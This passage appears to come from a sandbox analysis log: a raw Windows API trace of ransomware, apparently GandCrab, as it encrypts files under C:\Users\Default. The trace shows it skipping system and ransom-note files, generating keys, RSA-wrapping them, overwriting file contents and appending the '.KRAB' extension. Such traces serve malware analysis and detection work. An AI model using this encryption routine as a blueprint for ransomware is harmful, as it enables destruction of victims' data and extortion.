[0100.636] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf", lpString2="autorun.inf") returned 1 [0100.636] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf", lpString2="ntuser.dat") returned 1 [0100.636] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf", lpString2="iconcache.db") returned 1 [0100.636] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf", lpString2="bootsect.bak") returned 1 [0100.636] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf", lpString2="boot.ini") returned 1 [0100.636] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf", lpString2="ntuser.dat.log") returned 1 [0100.636] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf", lpString2="thumbs.db") returned -1 [0100.636] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf", lpString2="KRAB-DECRYPT.html") returned 1 [0100.636] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf", lpString2="KRAB-DECRYPT.txt") returned 1 [0100.636] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf", lpString2="CRAB-DECRYPT.txt") returned 1 [0100.636] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf", lpString2="ntldr") returned 1 [0100.636] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf", lpString2="NTDETECT.COM") returned 1 [0100.636] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf", lpString2="Bootfont.bin") returned 1 [0100.636] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0100.637] CryptAcquireContextW (in: phProv=0x338f3b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f3b4*=0x1010df8) returned 1 [0100.637] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0100.638] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0100.638] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0100.638] CryptGenRandom (in: hProv=0x1010df8, dwLen=0x20, pbBuffer=0x338f44c | out: pbBuffer=0x338f44c) returned 1 [0100.638] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0100.638] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.638] CryptAcquireContextW (in: phProv=0x338f3b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f3b4*=0x10113d0) returned 1 [0100.639] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0100.639] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0100.640] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0100.640] CryptGenRandom (in: hProv=0x10113d0, dwLen=0x8, pbBuffer=0x338f46c | out: pbBuffer=0x338f46c) returned 1 [0100.640] CryptReleaseContext (hProv=0x10113d0, dwFlags=0x0) returned 1 [0100.640] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.640] CryptAcquireContextW (in: phProv=0x338f3ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f3ac*=0x1010df8) returned 1 [0100.640] CryptImportKey (in: hProv=0x1010df8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f3b0 | out: phKey=0x338f3b0*=0xfbdfe0) returned 1 [0100.641] CryptGetKeyParam (in: hKey=0xfbdfe0, dwParam=0x8, pbData=0x338f3a4, pdwDataLen=0x338f3a8, dwFlags=0x0 | out: pbData=0x338f3a4*=0x800, pdwDataLen=0x338f3a8*=0x4) returned 1 [0100.641] CryptEncrypt (in: hKey=0xfbdfe0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338f3dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338f3dc*=0x100) returned 1 [0100.641] GetLastError () returned 0x0 [0100.641] CryptDestroyKey (hKey=0xfbdfe0) returned 1 [0100.641] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0100.641] CryptAcquireContextW (in: phProv=0x338f3ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f3ac*=0x10111b0) returned 1 [0100.642] CryptImportKey (in: hProv=0x10111b0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f3b0 | out: phKey=0x338f3b0*=0xfbdae0) returned 1 [0100.642] CryptGetKeyParam (in: hKey=0xfbdae0, dwParam=0x8, pbData=0x338f3a4, pdwDataLen=0x338f3a8, dwFlags=0x0 | out: pbData=0x338f3a4*=0x800, pdwDataLen=0x338f3a8*=0x4) returned 1 [0100.642] CryptEncrypt (in: hKey=0xfbdae0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338f3dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338f3dc*=0x100) returned 1 [0100.642] GetLastError () returned 0x0 [0100.642] CryptDestroyKey (hKey=0xfbdae0) returned 1 [0100.642] CryptReleaseContext (hProv=0x10111b0, dwFlags=0x0) returned 1 [0100.642] CreateFileW (lpFileName="C:\\Users\\Default\\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf" (normalized: "c:\\users\\default\\ntuser.dat{77a2c7ed-26f0-11e5-80da-e41d2d741090}.tm.blf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0100.643] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0100.643] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0100.644] ReadFile (in: hFile=0x320, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338f47c*=0x10000, lpOverlapped=0x0) returned 1 [0100.666] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xffff0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0100.666] WriteFile (in: hFile=0x320, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338f478*=0x10000, lpOverlapped=0x0) returned 1 [0100.666] WriteFile (in: hFile=0x320, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338f478*=0x208, lpOverlapped=0x0) returned 1 [0100.666] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.670] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.671] CloseHandle (hObject=0x320) returned 1 [0100.671] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.671] MoveFileW (lpExistingFileName="C:\\Users\\Default\\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf" (normalized: "c:\\users\\default\\ntuser.dat{77a2c7ed-26f0-11e5-80da-e41d2d741090}.tm.blf"), lpNewFileName="C:\\Users\\Default\\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf.KRAB" (normalized: "c:\\users\\default\\ntuser.dat{77a2c7ed-26f0-11e5-80da-e41d2d741090}.tm.blf.krab")) returned 1 [0100.672] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.673] FindNextFileW (in: hFindFile=0xfbe0e0, lpFindFileData=0x338f4d0 | out: lpFindFileData=0x338f4d0) returned 1 [0100.673] lstrcmpW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms", lpString2=".") returned 1 [0100.673] lstrcmpW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms", lpString2="..") returned 1 [0100.673] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms" | out: lpString1="C:\\Users\\Default\\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms") returned="C:\\Users\\Default\\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms" [0100.673] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0100.673] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\Default\\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms.KRAB") returned 114 [0100.673] lstrlenW (lpString="C:\\Users\\Default\\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms") returned 109 [0100.673] lstrlenW (lpString=".regtrans-ms") returned 12 [0100.673] VirtualAlloc (lpAddress=0x0, dwSize=0x1c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0100.674] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".regtrans-ms ") returned 13 [0100.674] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.674] lstrlenW (lpString="C:\\Users\\Default\\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms") returned 109 [0100.674] lstrlenW (lpString="C:\\Users\\Default\\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms") returned 109 [0100.674] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms", lpString2="desktop.ini") returned 1 [0100.674] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms", lpString2="autorun.inf") returned 1 [0100.674] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms", lpString2="ntuser.dat") returned 1 [0100.674] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms", lpString2="iconcache.db") returned 1 [0100.674] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms", lpString2="bootsect.bak") returned 1 [0100.674] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms", lpString2="boot.ini") returned 1 [0100.674] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms", lpString2="ntuser.dat.log") returned 1 [0100.674] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms", lpString2="thumbs.db") returned -1 [0100.674] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms", lpString2="KRAB-DECRYPT.html") returned 1 [0100.674] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms", lpString2="KRAB-DECRYPT.txt") returned 1 [0100.675] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms", lpString2="CRAB-DECRYPT.txt") returned 1 [0100.675] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms", lpString2="ntldr") returned 1 [0100.675] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms", lpString2="NTDETECT.COM") returned 1 [0100.675] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms", lpString2="Bootfont.bin") returned 1 [0100.675] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0100.675] CryptAcquireContextW (in: phProv=0x338f3b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f3b4*=0x1011898) returned 1 [0100.676] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0100.676] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0100.676] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0100.676] CryptGenRandom (in: hProv=0x1011898, dwLen=0x20, pbBuffer=0x338f44c | out: pbBuffer=0x338f44c) returned 1 [0100.677] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0100.677] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.677] CryptAcquireContextW (in: phProv=0x338f3b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f3b4*=0x1011018) returned 1 [0100.677] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0100.678] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0100.678] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0100.678] CryptGenRandom (in: hProv=0x1011018, dwLen=0x8, pbBuffer=0x338f46c | out: pbBuffer=0x338f46c) returned 1 [0100.678] CryptReleaseContext (hProv=0x1011018, dwFlags=0x0) returned 1 [0100.678] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.679] CryptAcquireContextW (in: phProv=0x338f3ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f3ac*=0x10113d0) returned 1 [0100.679] CryptImportKey (in: hProv=0x10113d0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f3b0 | out: phKey=0x338f3b0*=0xfbdae0) returned 1 [0100.679] CryptGetKeyParam (in: hKey=0xfbdae0, dwParam=0x8, pbData=0x338f3a4, pdwDataLen=0x338f3a8, dwFlags=0x0 | out: pbData=0x338f3a4*=0x800, pdwDataLen=0x338f3a8*=0x4) returned 1 [0100.679] CryptEncrypt (in: hKey=0xfbdae0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338f3dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338f3dc*=0x100) returned 1 [0100.680] GetLastError () returned 0x0 [0100.680] CryptDestroyKey (hKey=0xfbdae0) returned 1 [0100.680] CryptReleaseContext (hProv=0x10113d0, dwFlags=0x0) returned 1 [0100.680] CryptAcquireContextW (in: phProv=0x338f3ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f3ac*=0x1011018) returned 1 [0100.680] CryptImportKey (in: hProv=0x1011018, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f3b0 | out: phKey=0x338f3b0*=0xfbdae0) returned 1 [0100.680] CryptGetKeyParam (in: hKey=0xfbdae0, dwParam=0x8, pbData=0x338f3a4, pdwDataLen=0x338f3a8, dwFlags=0x0 | out: pbData=0x338f3a4*=0x800, pdwDataLen=0x338f3a8*=0x4) returned 1 [0100.680] CryptEncrypt (in: hKey=0xfbdae0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338f3dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338f3dc*=0x100) returned 1 [0100.681] GetLastError () returned 0x0 [0100.681] CryptDestroyKey (hKey=0xfbdae0) returned 1 [0100.683] CryptReleaseContext (hProv=0x1011018, dwFlags=0x0) returned 1 [0100.683] CreateFileW (lpFileName="C:\\Users\\Default\\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms" (normalized: "c:\\users\\default\\ntuser.dat{77a2c7ed-26f0-11e5-80da-e41d2d741090}.tmcontainer00000000000000000001.regtrans-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0100.684] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0100.685] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0100.685] ReadFile (in: hFile=0x320, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338f47c*=0x80000, lpOverlapped=0x0) returned 1 [0100.714] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff80000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0100.714] WriteFile (in: hFile=0x320, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338f478*=0x80000, lpOverlapped=0x0) returned 1 [0100.715] WriteFile (in: hFile=0x320, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338f478*=0x208, lpOverlapped=0x0) returned 1 [0100.716] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.720] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.722] CloseHandle (hObject=0x320) returned 1 [0100.722] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.722] MoveFileW (lpExistingFileName="C:\\Users\\Default\\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms" (normalized: "c:\\users\\default\\ntuser.dat{77a2c7ed-26f0-11e5-80da-e41d2d741090}.tmcontainer00000000000000000001.regtrans-ms"), lpNewFileName="C:\\Users\\Default\\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms.KRAB" (normalized: "c:\\users\\default\\ntuser.dat{77a2c7ed-26f0-11e5-80da-e41d2d741090}.tmcontainer00000000000000000001.regtrans-ms.krab")) returned 1 [0100.723] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.724] FindNextFileW (in: hFindFile=0xfbe0e0, lpFindFileData=0x338f4d0 | out: lpFindFileData=0x338f4d0) returned 1 [0100.724] lstrcmpW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms", lpString2=".") returned 1 [0100.724] lstrcmpW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms", lpString2="..") returned 1 [0100.724] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms" | out: lpString1="C:\\Users\\Default\\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms") returned="C:\\Users\\Default\\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms" [0100.724] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0100.724] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\Default\\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms.KRAB") returned 114 [0100.724] lstrlenW (lpString="C:\\Users\\Default\\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms") returned 109 [0100.724] lstrlenW (lpString=".regtrans-ms") returned 12 [0100.724] VirtualAlloc (lpAddress=0x0, dwSize=0x1c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0100.725] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".regtrans-ms ") returned 13 [0100.725] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.725] lstrlenW (lpString="C:\\Users\\Default\\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms") returned 109 [0100.725] lstrlenW (lpString="C:\\Users\\Default\\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms") returned 109 [0100.725] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms", lpString2="desktop.ini") returned 1 [0100.725] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms", lpString2="autorun.inf") returned 1 [0100.725] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms", lpString2="ntuser.dat") returned 1 [0100.725] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms", lpString2="iconcache.db") returned 1 [0100.725] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms", lpString2="bootsect.bak") returned 1 [0100.725] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms", lpString2="boot.ini") returned 1 [0100.725] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms", lpString2="ntuser.dat.log") returned 1 [0100.725] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms", lpString2="thumbs.db") returned -1 [0100.725] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms", lpString2="KRAB-DECRYPT.html") returned 1 [0100.725] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms", lpString2="KRAB-DECRYPT.txt") returned 1 [0100.726] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms", lpString2="CRAB-DECRYPT.txt") returned 1 [0100.726] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms", lpString2="ntldr") returned 1 [0100.726] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms", lpString2="NTDETECT.COM") returned 1 [0100.726] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms", lpString2="Bootfont.bin") returned 1 [0100.726] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0100.726] CryptAcquireContextW (in: phProv=0x338f3b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f3b4*=0x10114e0) returned 1 [0100.726] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0100.727] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0100.727] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0100.727] CryptGenRandom (in: hProv=0x10114e0, dwLen=0x20, pbBuffer=0x338f44c | out: pbBuffer=0x338f44c) returned 1 [0100.727] CryptReleaseContext (hProv=0x10114e0, dwFlags=0x0) returned 1 [0100.727] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.728] CryptAcquireContextW (in: phProv=0x338f3b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f3b4*=0x1011678) returned 1 [0100.730] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0100.730] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0100.730] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0100.731] CryptGenRandom (in: hProv=0x1011678, dwLen=0x8, pbBuffer=0x338f46c | out: pbBuffer=0x338f46c) returned 1 [0100.731] CryptReleaseContext (hProv=0x1011678, dwFlags=0x0) returned 1 [0100.731] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.731] CryptAcquireContextW (in: phProv=0x338f3ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f3ac*=0x10111b0) returned 1 [0100.731] CryptImportKey (in: hProv=0x10111b0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f3b0 | out: phKey=0x338f3b0*=0xfbe0a0) returned 1 [0100.731] CryptGetKeyParam (in: hKey=0xfbe0a0, dwParam=0x8, pbData=0x338f3a4, pdwDataLen=0x338f3a8, dwFlags=0x0 | out: pbData=0x338f3a4*=0x800, pdwDataLen=0x338f3a8*=0x4) returned 1 [0100.732] CryptEncrypt (in: hKey=0xfbe0a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338f3dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338f3dc*=0x100) returned 1 [0100.732] GetLastError () returned 0x0 [0100.732] CryptDestroyKey (hKey=0xfbe0a0) returned 1 [0100.732] CryptReleaseContext (hProv=0x10111b0, dwFlags=0x0) returned 1 [0100.732] CryptAcquireContextW (in: phProv=0x338f3ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f3ac*=0x1011898) returned 1 [0100.732] CryptImportKey (in: hProv=0x1011898, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f3b0 | out: phKey=0x338f3b0*=0xfbdae0) returned 1 [0100.732] CryptGetKeyParam (in: hKey=0xfbdae0, dwParam=0x8, pbData=0x338f3a4, 